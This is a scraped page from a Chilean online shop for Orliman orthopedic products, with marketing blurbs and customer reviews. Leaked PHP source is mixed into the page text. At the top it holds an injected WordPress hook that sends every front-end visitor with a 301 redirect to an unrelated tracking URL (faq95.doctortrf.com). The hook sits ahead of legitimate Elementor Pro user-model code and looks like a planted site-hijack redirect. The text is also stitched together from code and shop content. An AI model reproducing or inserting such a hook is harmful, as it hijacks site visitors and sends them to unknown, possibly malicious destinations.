function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); namespace ElementorPro\Modules\Notes\Database\Models; use ElementorPro\Core\Database\Model_Base; use ElementorPro\Core\Notifications\Traits\Notifiable; use ElementorPro\Core\Utils\Collection; use ElementorPro\Modules\Notes\Database\Query\User_Query_Builder; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } // TODO: Should be in Core. class User extends Model_Base { use Notifiable; /** * User's ID. * Note: Must be uppercase to correspond with the DB naming. * * @var int */ public $ID; /** * User's actual user name. * * @var string */ public $user_login; /** * User's nice name. * * @var string */ public $user_nicename; /** * User's email. * * @var string */ public $user_email; /** * User's URL. * * @var string */ public $user_url; /** * User's status. * * @var int */ public $user_status; /** * User's display name. * * @var string */ public $display_name; /** * Casts array. * * @var array */ protected static $casts = [ 'ID' => self::TYPE_INTEGER, ]; /** * Initialize a new `User` object from a `WP_User` object. * * @param \WP_User $user - WP_User object. * * @return static */ public static function from_wp_user( \WP_User $user ) { return new static( (array) $user->data ); } /** * Override the default Query Builder. * * @param \wpdb|null $connection * * @return \ElementorPro\Modules\Notes\Database\Query\User_Query_Builder() */ public static function query( \wpdb $connection = null ) { return ( new User_Query_Builder( $connection ) )->from( static::get_table() ); } /** * Get the model's table name. * * @return string */ public static function get_table() { return 'users'; } /** * Generate avatars urls based on user id. * * @param $id * * @return Collection */ public static function generate_avatars_urls( $id ) { return ( new Collection( [ 24, 48, 96 ] ) )->map_with_keys( function ( $size ) use ( $id ) { return [ $size => get_avatar_url( $id, [ 'size' => $size ] ) ]; } ); } /** * Get the user's avatars. * * @return Collection */ public function get_avatars() { return static::generate_avatars_urls( $this->ID ); } }

Envio a Todo Chile

Contamos con varias opciones de envío disponible para ti.

Paga Fácil y Seguro

Paga de manera online de manera rápida, segura y sin contacto.

Atención Profesional

Nuestro equipo de expertos te recomendará el producto más adecuado

MARCAS ORLIMAN

Quieres ser distribuidor exclusivo CONTACTANOS

¿Quieres tener beneficios y descuentos en todos nuestros productos? 

Obtendrás grandes beneficios, descuentos exclusivos pensados unicamente para ti y con un descuento del 10% en tu primera compra.

Nuestros Clientes Opinan

Raúl P.
Raúl P.
Brazalete Epicondilitis
Leer más
Muy buen producto, realmente calma el dolor del "codo de tenista". Yo lo uso bajo la ropa y no se nota. Me dolía hasta dar un apretón de manos. Recomendado!
Carlos Bahamondes
Carlos Bahamondes
Codera Elástica
Leer más
Buena codera, el material es firme y elástico, retorna a su forma por lo que puede ser usada por distintos brazos sin perder su forma. Super ayuda para aliviar dolor
Alexis Carvajal
Alexis Carvajal
Talonera Espolón Bursitis
Leer más
Me diagnosticaron espolón lo que me causaba mucho dolor al jugar. Coloqué las taloneras en mis zapatillas y el dolor se redujo en un 80%. Las recomiendo al 100%
Miguel Angel
Miguel Angel
Codera Elástica
Leer más
Buen producto 👌, me sirvió para la epicondilitis.
Anterior
Siguiente

PRODUCTOS ORTOPÉDICOS SELECCIONADOS PARA EL MEJOR RESULTADO POSIBLE

ORLIMAN TE MANTIENE INFORMADO

Diseño web por Rocket Media

Encuentra lo que buscas

Encuentra tu producto ideal para mejorar tu calidad de vida.